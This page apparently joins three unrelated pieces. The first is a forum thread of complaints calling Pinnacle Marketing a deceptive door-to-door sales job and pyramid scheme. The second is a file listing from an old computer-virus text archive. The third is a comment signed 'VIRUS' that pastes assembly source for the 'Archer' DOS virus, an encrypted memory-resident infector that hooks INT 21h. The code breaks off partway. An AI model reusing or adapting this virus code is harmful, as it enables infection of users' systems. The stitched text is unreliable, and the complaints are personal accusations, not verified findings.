Pinnacle Marketing
Don't be fooled
I want people to be made aware of another Cydcor Office in Connecticut. Pinnacle Marketing just like Integrated Concepts, The Maine House Group, and Premier Management Group is nothing more than door to door sales positions.
Pinnacle Marketing is also in the same office suite as Integrated Concepts (which you will find plenty of complaints about here on PC). Cydcor offices always promote from "within" and Pinnacle Marketing is a promoted office from Integrated Concepts. What that means is the manager for Pinnacle Marketing used to be an employee of the owner of Integrated Concepts. They share the office suite as well as the bills that go with it.
Is the job a scam? Not directly. However, the job listing you will see on Career Builder, Monster, and Craigslist are nothing short of vague and deceptive. Pinnacle Marketing does nothing with marketing or advertising. You can apply to the job if you want, however don't be surprised if you get contacted for an interview if you post your resume on CB or Monster. Avoid this position unless you want to take a job that is 100% commission and involves ridiculously long hours. Additionally, this office can only be described as being a corporate cult. Most of the employees there have no life outside of the office and usually spend the weekends with each other.
If you decide to interview for a position in HR, marketing, management,and advertising don't be fooled. You will end up doing door to door sales and that is it. They justify the position titles because you will be "cross trained" in all "aspects" of the business. What that means is you will be brainwashed and trained to find a group of equally gullible people to do what you do and then train people under them (sounds like a pyramid scheme, right?) The second round interview is a joke. It's called the "Day-of-O" and what that means is you will be following a stranger around for an entire day going door to door trying to sell a product or service (likely Direct Energy) to both commercial and residential clients. What you're doing is soliciting and 95% of the people you come across do not want to talk to you. If you are a moral person and care about others you will easily see how uncomfortable most people are when you enter their business or knock on the front door of their residence. They simply don't want you there.
Save yourself and keep looking for a job elsewhere with real earning potential and benefits. You've been warned.
Thank You for Your Reply! We are processing your message.
Your comment is successfully posted.
Do not be fooled by this company. It is a door-to-door job and that is it.
Ten years ago, I resoponded to a job posting for Pinnacle Advertising. When I went to the first interview, the man who interviewed me was very vauge on the job description. He told me he would tell me more about the company on the second interview. It was very weird, but I went to the second interview.
When I arrived for the second interview, they had a bunch of "recruits" like myself in the waiting area. Everyone was really confused as to what was going on. Anyway, all the workers came out and took one "recruit" with them. We spent the entire day knocking on doors in the neighborhoods of Nashville.
Later, at dinner, the Pinnacle guy I was with described their business model which was a typical pyramid scheme. If they had told me that on the first interview, I would not have lost $100 taking the day off of work for a second interview. This is a pyramid scheme.
If you are interested in a pyramid scheme, go for it. If you are not, do not waist your time.
I interviewed as the description of doing marketing at the company sounded great! The interview was in a lack luster building office, he was 30 minutes late.
In the interview it became clear that the intention of anyone, in any position, hired at Pinnacle is to force them to go from bottom to top and run their own office within a year or two. I let the interviewer (who was probably 22 years old and hadn't fixed his hair) know that I wasn't interested in running my own business, that I wanted to do marketing/pr and grow that way, and he was clear that their intentions are very different...that he wants all of his staff to move up in the company so that they can open new offices under him.
Very much sounds like a pyramid scheme to me! I just wish their online job description was clear of the position: start in marketing, trained by a current staff member, then get trained to train other new marketing hires, then open your own office.
I'm glad i read this, of course I agreed to the interview and thought "hey entry level assistant manager sounds great" but that same day my boyfriend and I did some research and realized that it wasn't legit. Of course on the one application it said NO door to door sales NO telemarketing etc.
and then we realized on another application for the same position didn't even say that at all. Heather T I am also from South Bend, glad we didn't end up going.
I emailed Lindsey last night and told her there wasn't enough information on what I would actually be doing. So glad I read this =)
I am glad I googled this first because when I did, I found that there are several sites for "Pinnacle Marketing", and when I used the domain on the end of the email address of the "HR" rep who sent me a "confirmation" email with directions before I agreed to the "interview" because it was in my inbox before we hung up after I asked her several questions she was unable to answer. It only took me about 2 sentences to realize that she was reading from a script.
A script? Really? That threw up a HUGE red flag, but I let her finish. I asked her who her "clients" are that she mentioned, along with more detail about the job and all she would tell me is something about working outside of the mall and the client is DirecTV.
I have seen someone with a little tent and some tables with brochures, trying to sell either DirectTV or Dish so if THAT is what they are, NO THANKS. After reading this, I am happy to know that my instinct was right. Nowadays, for someone with my skill set and education, I should know better if I get a call-back the next day after I applied. And to the *** who was mad at the OP for ripping on door-to-door, -THE POINT IS THAT IN THIS SITUATION, IT IS A RIPOFF, YOU DON'T GET PAID UNLESS YOU SELL AND THEY DON'T TELL YOU AHEAD OF TIME.
TO GET YOU TO "INTERVIEW" THEY LIE AND SAY THAT THERE IS SALARY, BUT ON THE WEBSITE FOR MY AREA (WHICH IS BRAND NEW, BTW) www.pinnaclemarketingsolutions.net , THEY CLEARLY STATE THAT THEY FOLLOW THE "PROMOTE FROM WITHIN" MODEL. Not to mention, if the company is real, they have ONE website for the whole company, regardless of the location, that is not the case for the company that contacted me. They have their very own new website that focuses more on their hiring, vacation and promoting than they actually do about their client services.. what does that tell you?
Their website is ONLY about hiring people, except for the very last box on the bottom, labeled "Client Services". Last time I checked, any company that's worth interviewing with actually makes it hard to get an interview and "careers" on their website is one of the smallest links on their site, down at the bottom.
Nobody has said whether or not the first "interview" was a group or individual, but I learned a LONG time ago, any "company" that has people come in as groups, needs to push to a large audience in a short amount of time, and it's all scripted in a way that answers most questions people have and sells to them at the same time. If any place has to "sell" the job to you, then there is always a catch.
Don't get down on door-to-door sales. Just cause you lack self-confidence, doesn't mean it can't work for someone else. I did Worldbook and did well.
The real losers are they who do not try.
Bye, y'all.
Please help me is NE Partners the same company as Pinnacle? I do not want to waste my time if so??
OH no way I had an interview with NE Partners today thanks, I knew something weird was up :)
THIS IS A TOTAL WASTE OF TIME ITS THE SAME COMPANY AS BEFORE THE RECEPTIONIST CALLED ME SO MANY TWICE BEFORE TO COME IN FOR AN INTERVIEW. DOOR TO DOOR SCAM NO THANKS AND STOP CALLING ME
I did this for a day and left...they lied to me to get me to come shadow someone for a day. most pathetic day of my life
I just received a call from a company at this same address, suite 19, and I believe they said it was called "NE Person Marketing" or something along those lines. I have an interview Monday...is it a waste of time or do you think this could be a different company?
I already got scammed by a company called Primerica, I am just trying to avoid another hassle before I take a day off from my temporary job. Thanks!
I worked for this company for a very brief time and everything in these posts is correct, 100%. All lies and sales tactics and a bunch of cult orientated brainwashing.
After I q2uit I was owed money and never paid. They lie and tell you it is a salary position to get you into the interview. Expect to work about 12 hour day no matter the weather. If it is raining you have to walk dood to door in the rain, even snow and in a suit if you are a male.
Company is a joke and so are the owners.
What they are in a nutshell is people who couldn't make it in the work force so they found a scheme and typically undervalued people to use and manipulate. Beware!
So I just had pretty much the same thing with a group called Trident. I was promised a position as a entry-level management, went to the first interview.
First off, I walk in and there is no real office. It was a bunch of chairs and a then around the corner a office for one guy no one else there. He tells me the second interview will be me following some guy to a store and watching him try to recruit people for DirectTv or something. I went in for the second interview and while sitting there was listening to him and some others in a conference meeting and it just seemed too shady.
I got up and left. I feel like I avoided a huge mess.
Be so careful who you respond to on careerbulider and sites like that. You don't know always what your walking into.
Wow I'm glad I read this I'm trying to change careers and don't want to wast my time with *** like these
SO back in May I had recieved an email from Premier Management Group and I decided to do some research and called the BBB and sure enough they aren't credited.. (which is illegal) And now have been contacted by Pinnacle Marketing and the same *** not and accredited business.
I have reported them. Its a scam, pyramid scheme.
Please be careful, do your research and listen to your gut... Goodluck to all
The address is 151 New Park Ave., Hartford, CT across from the Stop and Shop. The lady called me and told me to come in for an interview and that they were looking for someone who wants to eventually end up being a manager. I am so happy I found this review and I hope no one else falls for this scheme..
800-5.txt 82314
A Guide to the Selection of Anti-Virus Tools and Techniques, by W.T. Polk and L.E. Basshan, December 1992
abaittut.txt 14720
Information on the "Anti-Bait" Method of Virus Transmission
adebgtut.txt 15848
Anti-Debugger Techniques by The Master Hides Behind the Mask
agents.txt 36769
McAfee Associates Agent Listing (February 23, 1993)
allvirus.vir 22209
PC Virus Listing, by Jim Goodwin, 1989
allvirusdf.vir 30897
Slightly Updated Version of Jim Goodwin's List.
amigvir1.txt 3314
A History of the Amiga Viruses, by Paul M. of POISON Cracking Association
amigvir2.txt 6144
A History of the Amiga Viruses by Ed Earing
amigvir3.txt 1920
The Amiga IRQ Virus: It's Out! (December 28, 198
anaco001.txt 16048
ANACONDA #001: The Official VIPER Electronic Mag by Viral Inclined Programming Experts Ring
apply.yam 4117
APPLICATION: Youths Against McAfee
arcvnews01.txt 56065
ARCV: The Association of Really Cruel Viruses Newsletter
armag911.txt 2594
The 911 Virus, Disassembly and Commentary by Black Wolf
atari101.txt 54379
Viruses 101: Chapter 1
avcr-01.001 3088
Amateur Virus Creation Research Group Magazine: Introduction
avcr-01. 002 39187
Amateur Virus Creation Research Group Magazine: The New DS-512 Virus
avcr-01.003 3223
Amateur Virus Creation Research Group Magazine: Nuking, by Thimble
avcr-01. 004 3605
Amateur Virus Creation Research Group Magazine: The *** Virus
avcr-01.005 24313
Amateur Virus Creation Research Group Magazine: the AMI Virus
avcr-01.006 7359
Amateur Virus Creation Research Group Magazine: An Introduction to ASM
avcr-01.007 21995
Amateur Virus Creation Research Group Magazine: Research of the Air Cop Virus, by Security Threat
avcr-01.008 22344
Amateur Virus Creation Research Group Magazine: Research of the Wigger Virus, by Security Threat
avcr-01.009 2881
Amateur Virus Creation Research Group Magazine: Analysis of Connie
avcr-01.010 3392
Amateur Virus Creation Research Group Magazine: OhhLala Virus
avcr-01.011 4612
Amateur Virus Creation Research Group Magazine: Twister Virus
avcr-01.012 2892
Amateur Virus Creation Research Group Magazine: Vlamix 1.0
avirus.txt 4458
Overview of Some Amiga Viruses
backdoor.txt 6512
Information About Backdoors and MS-DOS and BIOS That Can Be Used by Viruses, by Qark of VLAD
baitdet.txt 6722
Advanced Bait Detection by CoKe of VLAD
batvirus.txt 668
Creating a Batch File Virus
bbinterv.iew 21652
Anatomy of a Virus Author: A Biography of the Black Baron by Matthew Probert
bdinterv.iew 18873
Interview with A Virus Writer named Blode by The Unforgiven
bedtime.nfo 4338
NFO: The Bedtime Virus, by Youngsters Against McAfee (November 16, 1992)
blckbook.txt 24240
The little Black Book of Computer Viruses Volume One: The Basic Technology by Mark A. Ludwig (1991)
bluenine.nfo 9706
A Technical Discussion About the Blue Nine Virus by Conzouler (November 19, 1994)
braininf.vir 4577
Information on the Brain Virus And Variants
bulgfact.txt 57241
The Bulgarian and Soviet Virus Factories by Vesselin Bontchev, Director of Laboratory of Computer Virology, Bulgarian Academy of Sciences, Sofia, Bulgaria
bulgfactdoc.vir 57241
The Bulgarian and Soviet Virus Factories
catvir.txt 10223
How to write a virus program, by the Cheshire Cat
ccinterv.iew 8675
Interview with Crom-Cruach of Trident
chaos.nfo 3677
INFO: The Viral Collector's Kit #1 by The Knights of Chaos (February 4, 1995)
cmvs-1.v1 37357
ViriiSearch: The Virus Research Newsletter Volume 1 Number 1
cmvs-2.v1 60096
ViriiSearch: The Virus Research Newsletter Volume 1 Number 2 (July 2, 1992)
cmvs-3.v1 59651
ViriiSearch: The Virus Research Newsletter Volume 1 Number 3 (August 2, 1992)
cnws2000.vir 14585
Computer Virus Research and Information Service Index
cnws2001.vir 17995
Computer Virus Research and Information Service #1
cnws2002.vir 3036
Computer Virus Research and Information Service #2
cnws2003.vir 5457
Computer Virus Research and Information Service #3
cnws2004.vir 44383
Computer Virus Research and Information Service #4
cnws2005.vir 49238
Computer Virus Research and Information Service #5
cnws2006.vir 8975
Computer Virus Research and Information Service #6
cnws2007.vir 8956
Computer Virus Research and Information Service #7
cnws2008.vir 91748
Computer Virus Research and Information Service #8
comp.vir 8320
The USENET Virus: A Cautionary Tale by Peter de Silva (April 20, 1990)
cpi-1.txt 20245
Corrupted Programming International Newsletter #1 by Doctor Dissector (June 30, 1989)
cpi-2.txt 99461
Corrupted Programming International Newsletter Issue #2
cpi1.vir 24305
CPI Newsletter Volume #1, 1989
cpi2.vir 98758
CPI Newsletter Volume #2
cpivirus.txt 23568
Corrupted Programming Internation #1: Computer Viruses, a Protagonist's Point of View by Doctor Dissector (June 27, 1989)
cpivirus2.txt 90571
Corrupted Programming International #2 by Doctor Dissector: Trojan Horses and Virii: A Protagonist's Point of View (July 27, 1989)
crcrevue.vir 55986
Comparison: Products to Detect Changes to Programs
csvir87.vir 4771
CompuServe Magazine's Virus History Timeline: 1987
csvir88.vir 103572
CompuServe Magazine's Virus History Timeline: 1988
csvir89.vir 69893
CompuServe Magazine's Virus History Timeline: 1989
cvirs.101 1****
C VIRUS 101: An Introduction to Viruses in C
cvm.txt 23552
Computer Virus Myths by Rob Rosenberger with Ross Greenberg
datut001.txt 8220
Scan Strings, How They Work, and How to Avoid Them, by Dark Angel
datut002.txt 9941
An introduction to Nonoverwriting Virii by Dark Angel
datut003.txt 14844
An introduction to Nonoverwriting Virii II: EXE Infectors, by Dark Angel
datut004.txt 18463
An Introduction to Nonoverwriting Virii III: SYS Infectors by Dark Angel
datut005.txt 6571
Code Optimization: A Beginner's Guide by Dark Angel
datut006.txt 10873
Advanced Polymorphism Primer by Dark Angel
datut007.txt 8171
SFT's and Their Usage, by Dark Angel
datut008.txt 17676
EXE Self-Disinfection by Dark Angel
datut009.txt 11690
Boot Infectors by Dark Angel
datut010.txt 5910
UMB Residency by Dark Angel
desc.sdi 444
NFO: The Smeg Virus Construction Kit
deth001.rot 4661
Megadeth's Guide to Virus Researching Part I by Megadeth of .ROTing [DeTH]
dhcivwar.txt 2206
Relationship Chart of the Civil War and Related Viruses by TridenT (1993)
dhinterv.iew 8668
Interview with Dark Helmet of Trident
diogenesdoc.vir 3217
Diogenes 2.0 Documentation and User Manual
dirstlth.txt 6061
Directory Stealth Techniques of Viruses (FCB)
drkfib01.txt 3524
Virus Writers Reply to the SCAN.EXE Program
enigma.asm 18797
DISASSEMBLY: The Enigma Virus
european.txt 19456
List of Known Viruses in the UK, by Joe Hirst of the British Computer Virus Research Centre
eval.vir 26111
Anti-Viral Product Evaluation
fester.vir 10122
Festering Hate: A Description of an Apple II Virus, by the Bowen Arrow
firefly.txt 19617
The Firefly Virus, by Nikedamus
fish.vir 9382
Thoughts on the Fish Virus
fndint21.txt 12608
Finding INT 21's Real Address Using the PSP by Satan's Little Helper
fog.txt 17483
FOG: A Polymorphic Encription Algorithm by Eclipse
fullstlt.txt 10033
A Full Stealth or Disinfection on Open by Blonde of Immortal Riot
funbot2.cvp 3190
How the Boot Sequence Operates, Relevant to Virus Infection
funbot3.cvp 3465
How the Boot Sequence Operates Relevant to Viral Infection, Part II.
fungen1.cvp 2792
Computer Operations and Viral Operations
fungen2.cvp 2721
Viral operations: How Viruses Function
fungen3.cvp 2672
How Viruses Use Operating Systems
fungen4.cvp 2629
How Viruses Hide in System Layers
fungen5.cvp 2939
How Viruses are Activated
fungen6.cvp 2679
How to Detect Changes made by a Virus
fungen7.cvp 2716
Checking Files for Viruses
fungen8.cvp 3033
Checking Files for Viruses, Part II
fungen9.cvp 2664
Checking the System Files for Viruses
fungena.cvp 2766
How Viruses Avoid Detection
funpiv1.cvp 2542
Viruses that Affect and Infect Files
funpiv2.cvp 2375
Viruses and how they Insert Themselves
funpiv3.cvp 2529
How to Add a Virus to a Program
funpiv4.cvp 2895
Viral Code "Association"
funpiv5.cvp 2872
Variations of Computer Virus Infection
g2.txt 25600
Phalcon/Skism's G^2 Version 0,70: The Second Generation of Virus Creation by Dark Angel (January 1, 1993)
gao_rpt 106252
The General Accounting Office Report on Computer Viruses, 1988
gf.txt 1966
Information and BBS List for General Failure, a H/P/A/V/C Oriented Computer Organization
glath.vir 21116
Computer Viruses: A Rational View, By Dr. Raymond Glath
gold-bug.txt 9373
Analysis of the Gold Bug Virus
goodwin.txt 137805
An Analysis of Computer Virus Structures (April 7, 1989)
greetng1.txt 3202
NFO: The Grretings Virus by Youngsters Against McAfee (January 2, 1993)
guardian.bbs 29058
The Guardian Lists: An Abbreviated Trojan Alert List Issue #1 (November 12, 1989)
guardian.vir 53823
The Guardian List, Issue #1, Sept. 25, 1989
hackmisc.9 9303
Hacked/Miscellaneous Dangerous Files, #9
hate.txt 1540
BBS AD: The Immortal Hate BBS
hatedetect.vir 5984
Program to Detect the Festering Hate or CyberAIDS Apple II Virus, by Tom Weishaasr (July, 198
hitler.a86 3****
The HITLER virus: commented in a rough 'n' ready way by the Crypt Newsletter staff for issue #11, January 1993
hormones.vir 19584
Net Hormones: Infection Control using Cooperation among Computers
hr5061.vir 2309
The text of H.R. 5061
hysteria.vir 18748
Virus Hysteria! By Richard B. Levin
ibmpaper.vir 87040
Coping with Computer Viruses and Related Problems
identify.txt 20602
Developing Virus Identification Products, by Tim Sankary, 1989
illegal.nfo 2083
NFO: Illegality, the Unstoppable Crime Machine (November 12, 1994)
implemen.mca 42307
Implementing Anti-Viral Programs, by John McAfee 1989
index.mag 1201
Index to SLAM Magazine Issue #1 (January 1997)
intro1.cvp 2475
Introduction to the Computer Virual Programs Column
ivm-95.1 14****
Immortal Virus Magazine Issue #95.1
jeru-b.asm 42115
DISASSEMBLY: The Jerusalem B Virus
jeru-dc.vir 3328
Analysis of the Jerusalem DC Virus
jtinterv.iew 17375
INTERVIEW: John Tardy of Trident in The Netherlands
jvvirus.txt 42968
Jerusalem B Virus Source Code
killhead.vir 959
Virus Source Code that Destroys the Disk Head
levine.pap 13323
Potential Virus Attack by L. P. Levine
lminterv.iew 54289
The Faces Behind the Masks by Sara Gordon (November 1994)
locprst.txt 32002
Excerpt from "The Virus Creation Labs: A Journey Into the Underground": A Preist Deploys His Satanic Minions
ltlmess.slt 4005
The Little Mess Spawning Virus Source from Crom-Cruach of Trident (1992)
lzinterv.iew 20100
INTERVIEW: Lord Zero, Virus Writer
macv.txt 24130
How to Write a Virus for the Macintosh, or How I Learned To Stop Worrying And Love The Resource Manager
malmsey.txt 4058
Information on the Malmsey Virus (October, 1992)
mayhem.txt 1384
Mayhem at Firms Plagued by Virus, by Philip Braund of The Mirror, transcribed by Phantasm (March 7th, 1992)
mbfamily.txt 6942
The Mayberry Family of Virus by HypoDermic
mbinterv.iew 13793
INTERVIEW: Metabolis of VLAD (Virus Writing Group)
mcaffvirus.txt 7075
Virus Characteristics, by McAfee Virus Scanning
mdef.inf 4864
The MDEF Macintosh Virus, by Tom Young of Cornell Information Technologies
melissa.txt 13926
The Melissa Macro Virus, a Report Prepared by Robert M. Slade
memres.txt 7779
Some Information on Memory Residence Methods for Viruses
michael.asm 6969
DISASSEMBLY: Michelangelo Virus
michangl.txt 6840
The Michaelangelo Virus Source Code
mk-chart.txt 1835
A Virus Relationship Chart of Masud Khafir's Viruses
mkinterv.iew 12153
INTERVIEW: Masud Khafir of Trident
mkvirlst.txt 17466
A List of Viruses Written by Masud Khafir of Trident
necro.a86 2****
Source code for the Necro, A.k.a. "Skull" Virus
net.hor 19511
Net Hormones: Part 1 - Infection Control assuming Cooperation among Computers
newinstl.txt 1472
Installation Instructions for Nowhere Man's Virus Creation Library v1.00
nist01.txt 5761
Columbus Day Virus: Press Release by Jan Kosko Sept. 22, 1989
nist02.txt 4238
Columbus Day Virus: A Fact Sheet
offspr82.txt 1470
DOCUMEN#TATION: Offspring v0.82 by Virogen (September 6, 1993)
p1.txt 10934
Attack of the Computer Virus, By Lee Dembart
pcblkjck.txt 4608
Features of Blackjack Virus (PC) (January 24, 1989)
peacevir.vir 2573
Computer Virus Hits Again (The Peace Virus)
ph-vir1.txt 19794
Dark Angel's Phunky Virus Writing Guide #1
pngintrv.iew 9876
INTERVIEW: Persona No Grata of Trident in The Netherlands
polyflag.txt 18411
A Humble PolyMorphic Engine Primer by Absolute Overlord
polymorf.txt 31851
Post Discovery Strategies: Hiding Your Virus After Discovery, by Sepultura
polymorph.txt 17432
Post Discovery Strategies: Hiding Your Virus After Discovery, by Sepultura
polymrph.txt 14524
Polymorphic Viruses Escape Detection but Get Our Attention
polyvir.txt 6299
Computer Virus Catalog 1.2: Dedicated Virus (31-January 1992)
popscia86.vir 4472
Popoolar Science virus - a very simple overwriting infector
portexec.txt 9293
Infection of Portable Executables by Qark and Quantum of VLAD
ps-vir1.txt 19801
Dark Angel's Phunky Virus Writing Guide (Part 1)
ps-vir2.txt 29546
Dark Angel's Phunky Virus Writing Guide (Part 2) The Replicator
ps-vir3.txt 20133
Dark Angel's Phunky Virus Writing Guide (Part 3) Non-Resident Virii, Part II
ps-vir4.txt 22970
Dark Angel's Phunky Virus Writing Guide (Part 4) Resident Virii, Part I
ps-vir5.txt 20131
Dark Angel's Phunky Virus Writing Guide (Part 5) Resident Viruses, Part II
ps_vir1.vir 19865
Phalcon Skism, Part I
ps_vir2.vir 29617
Phalcon Skism, Part II
ps_vir3.vir 20204
Phalcon Skism, Part III
ps_vir4.vir 23041
Phalcon Skism, Part IV
qkinterv.iew 15053
INTERVIEW: Qark of Virus Labs and Distribution (VLAD) by The Unforgiven
rab_mem.apl 3110
APPLICATION to Join RABID by ProTurbo of RABID (1991)
ratboy-1.txt 12067
RatBoy's Overwriting Virus Tutorial
ratboy-2.txt 15758
RatBoy's Overwriting Virus Tutorial Part II
readlist.vir 12800
An abbreviated bibliography for computer viruses
resist.txt 29417
Resist! Further Virus Strategies by Mouth of Sauron
rjinterv.iew 31156
An Interactive Interview with Virus-Writer Rajaat of Genesis
robin.hod 6655
Viruses and System Security (a story)
rstut001.txt 13765
Disinfecting an Infected File by Rock Steady of NuKE
rstut002.txt 9350
TSR COM Infections by Rock Steady of NuKE
rstut003.txt 7782
Constructing Kit on Infecting .COM by Rock Steady of NuKE
rstut004.txt 20142
Infection on Closing by Rock Steady of NuKE
rstut005.txt 13378
EXE Infections Part I: Infection Process, by Rock Steady of NuKE
rstut006.txt 7572
EXE Infectors Part II by Rock Steady of NuKE
rstut007.txt 11905
Directory Stealth by Rock Steady of NuKE
rstut008.txt 7273
Directory Stealth Method 2 by Rock Steady of NuKE
rstut009.txt 5350
Memory Stealth by Rock Steady NuKE
rstut010.txt 28965
The Dangers of Thunderbytes TBClean Emulation Techniques by Rock Steady of NuKE (August, 1993)
rumors.txt 9250
Rumors of Worms and Trojan Horses: Danger Lurking in the Public Domain, by Mike Guffey
rvlatn1.vir 48324
Revelation, a Virus E-Zine, Vol. 1 Issue 1
samson.vir 5642
Samson's PC Virus List
scitzo.nfo 1954
Virus Spotlight: The Scitzo Virus
sdwlnd02.ans 3788
ANSI BBS AD: Shadowland BBS
six_byte.pad 17377
Six Bytes for Virus Detection in the MS-DOS Envrionment, by Padgett Peterson, 3/29/1991
smallvir.txt 3568
The Smallest Virus I Could Manage (263 Bytes)
span02.vir 1735
You can't release the Worm source code, says SPAN
stealth.txt 3798
Elusive New Viruses Can Avoid Detection by Dennis Flanders
steroid.vir 2304
Discussion of a Trojan Horse program called "Steroid"
stoned-b.txt 10898
The Stoned-B Virus
stoned1.vir 3392
To Remove the Marijuana (Stoned) Virus from HD
stoned_d.law 9105
An Explanation of how the Stoned Virus operates by Mike Lawrie
stormbrg.rt1 2158
A Goodbye from Stormbringer of Phalcon/Skism From the World of Viruses
stormbrg.rt2 1554
A Goodbye from Stormbringer of Phalcon/Skism From the World of Viruses (Part II) (1995)
tag.ans 14090
ANSI BBS AD: The Adventures of Guild
talons01.txt 5850
Some Background on PuKE: An Introduction from TLN
talons02.txt 28869
The True Story about Talon by Talon of NUKE (April, 1994)
talons03.txt 2293
An Incredibly Complicated Tale of Mystery and Intrigue
talontut.txt 7844
Information About Mulipartite Infection of Viruses
tdoc1.txt 14961
Documentation for a Virtual Mouse Drive That's a Virus, by Seth Comstock (August 1993)
tdoc2.txt 5179
Documentation for a Story Program That's Actually a Virus, (1993)
troj.hac 4652
Lots of warnings about EGABTR.EXE
troj.txt 7528
Other warnings for other random virus programs
trojan.vir 9191
How someone's BBS got whacked with Viruses in 1984
tsrtut.txt 4484
A Documentation on Creating TSR Viruses
tuinterv.iew 6820
Intervue with TU About Virus Creation
universa.mol 13613
A universal Detection Model by Chris Ruhl and James Molini
usavirus.vir 2175
Supposed use of a computer virus during Desert Storm
v101pt1 14746
Virus 101 - Chapter 1 by George Woodside (March 1, 1989)
v101pt2 18596
Virus 101 - Chapter 2 by George Woodside (March 6, 1989)
v101pt3 19444
Virus 101 - Chapter 3, by George Woodside (March 13, 1989)
v101pt4 5845
Virus 101 - Chapter 4 by Gordon Meyer (March 30, 1989)
varicell.txt 5474
The Varicella Virus Source Codes, by Rock Steady
vdetect.vir 13696
A Universal Virus Detection Model by Chris Ruhl and James Molini
verify_r.txt 24830
Virus Verification and Removal -- Tools and Techniques by David M. Chess, Nov. 18, 1991
vguide.txt 21135
Computer Viruses: A Rational View by Raymond M. Glath
vi900906.txt 187667
Fidonet Message Base Disucssing Viruses (Summer 1990)
vi901029.txt 181138
Fidonet Message Base Disucssing Viruses (Summer 1990)
vir-1.v1 37205
ViriiSearch: The Virus Research Newsletter Volume 1 Issue 1
vir-2.v1 60027
ViriiSearch: The Virus Research Newsletter Volume 1 Issue 2 (July 2, 1992)
vir-3.v1 59654
ViriiSearch: The Virus Research Newsletter Volume 1 Issue 3 (August 2, 1992)
vir.txt 19800
Dark Angel's Phunky Virus Writing Guide
vir2.txt 29557
Dark Angel's Phunky Virus Writing Guide Installment II
virbillfax.vir 4169
NCSA Testimony on Virus Bills, 1990
virethic.txt 13124
Establishing Ethics in the Computer Virus Arena by Paul W. Ferguson, Jr. (September 1992)
virii.txt 17712
What You Should Know About Computer Viruses by BlenderHead
viris03.txt 7208
Some of the Less Known Viruses (Humor)
virpgm01.txt 12883
Virus Programming Basics Issue #1
virpgm02.txt 23762
Virus Programming Basics Issue #2: Not So Basic
virs.vir 11931
Discussions about the Jerusalem B Virus
virukpc.txt 13056
Known PC Viruses in the UK and their effects, by Dr. Alan Solomon, 1989
virus 5314
Virus Attack! By Rick Arnold
virus-al.ert 2065
Local Area Virus Update, Bay Area - Sacramento, 21 Sep, 1989
virus.1 1821
Virus Discussion on a BBS
virus.kie 32573
The Infection of PC Compatible Computers by Stephen E. Kiel and Raymond K. Lee of the Georgia Institute of Technology
virus.txt 5160
Comparison between Mcaffe's SCAN.EXE (3-25-92) and F-PROT.EXE (4-5-92) by The Researcher and Scan Man
virus1.dna 17710
What You Should Know about Computer Viruses by Blinderhead
virus1.vir 4223
Report on the DATACRIME Virus
virus101.vir 58631
Viruses 101: A Information Set
virus101001.vir 13796
Virus 101 Chapter 1
virus101002.vir 17548
Virus 101 Chapter 2
virus101003.vir 18347
Virus 101 Chapter 3
virus101004.vir 4971
Virus 101 Chapter 4
virus2.txt 11729
The Virus Informer: Your Weekly Virus Newsletter by Mark E. Bishop
virus3.txt 7585
The Virus Informer by Mark E. Bishop: The Macintosh Virus
virus4.txt 4268
The Virus Informer Chapter 4: The Engine That Kills
virus5.txt 49830
The Virus Informer Chapter 5: The Virus List
virus6.txt 1729
The Virus Informer Chapter 7: The Virus Informer Fax Bulletin Service
virus7.txt 1762
The Virus Informer by Mark E. Bishop Chapter 7: Next Week
virus_my.ths 27085
Computer Virus Myths, by Rob Rosenberger (1988-****)
virus_st.whm 16646
A New Stategy for Computer Viruses by William H. Murray
virusbas.vir 1338
An example of a Virus in BASIC
virusbib.txt 4480
Bibliography for Computer Viruses, by Ted Landberg, 02/24/1988
virusbro.vir 9856
Computer Viruses and Trojan Horses; A Guide to Protecting Yourself
virusdet.txt 50981
Virus Detection Alternatives, by Patrick Min
virusdoc.vir 205175
The Computer Virus Epidemic, 1987-****. Article Compilation
viruses.pro 10368
How to write a Virus Program, by The Cheshire Cat
viruses.txt 3123
Safe Telecommunicating may be your Best Protection against Viruses, by Micharl Fischer, A+ Magazine, August 1988
viruses.uss 20740
Viruses in the USSR by Eldar A. Musaev
virusfaq.txt 84745
FAQ: VIUS-L/comp.virus Frequently Asked Questions (November 18, 1992)
virusinf.vir 9216
A Suggested Readings List for Computer Viruses by Jon Mack
virusl.vir 1887
The Virus Informer, Issue #6
virusone.vir 4323
The Virus Informer, Issue #1
virussum.doc 558766
Virus Information Summary List, March 17, 1991, by Patricia M. Hoffman
virussum.txt 607049
The Virus Information Summary List, April 20, 1991 by Patricia M. Hoffman
virusx.txt 14142
Information on VirusX by Steve Tibbet, as well as a list of Amiga Viruses
vlab102.vir 19999
Viral Lab 102, May 1994
wininf01.txt 25224
Windows Executable Infection by Qark and Quantum of VLAD
wininf02.txt 13444
Calling the Windows API in Assembly Language by Qark of VLAD
wordmacro.txt 86611
FAQ: The MS Word 6.x Macro Viruses FAQ v2.0
xyz.txt 3424
Information on the XYZ (Examine Your Zipper) Virus (January, 1994)
yam-ivp.nfo 3769
NFO: The Instant Virus Production Kit by Youngsters Against McAfee (June 12, 1992)
yetiser_ 15345
Polymorphic Viruses: Implementation, Detection, and Protection by VDS Advanced Research Group/Tarkan Yetiser 1993
Report
13. Written by >>>>>>>>>>>VIRUS, on 01-12-2010 08:56
; archer.asm : [Archer] MnemoniX `94
; Created with Biological Warfare - Version 0.90á by MnemoniX
PING equ 0AE3Bh
PONG equ 0CD28h
STAMP equ 30
MARKER equ 04D4Dh
code segment
org 0
assume cs:code,ds:code
start:
db 0E9h,3,0 ; to virus
host:
db 0CDh,20h,0 ; host program
virus_begin:
db 0BBh ; decryption module
code_offset dw offset virus_code
mov dx,VIRUS_SIZE / 2 + 1
decrypt:
db 02Eh,081h,07h ; ADD CS:[BX]
cipher dw 0
inc bx
inc bx
dec dx
jnz decrypt
virus_code:
call $ + 3 ; BP is instruction ptr.
pop bp
sub bp,offset $ - 1
push ds es
mov ax,PING ; test for residency
int 21h
cmp bx,PONG
je installed
mov ax,es ; Get PSP
dec ax
mov ds,ax ; Get MCB
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
mov es,word ptr ds:[12h]
push cs ; copy virus into memory
pop ds
xor di,di
mov si,bp
mov cx,(virus_end - start) / 2 + 1
rep movsw
xor ax,ax ; capture interrupts
mov ds,ax
sub word ptr ds:[413h],(MEM_SIZE+1023) / 1024
mov si,21h * 4 ; get original int 21
mov di,offset old_int_21
movsw
movsw
mov word ptr ds:[si - 4],offset new_int_21
mov ds:[si - 2],es ; and set new int 21
installed:
call activate ; activation routine
pop es ds ; restore segregs
cmp sp,MARKER ; check for .EXE
je exe_exit
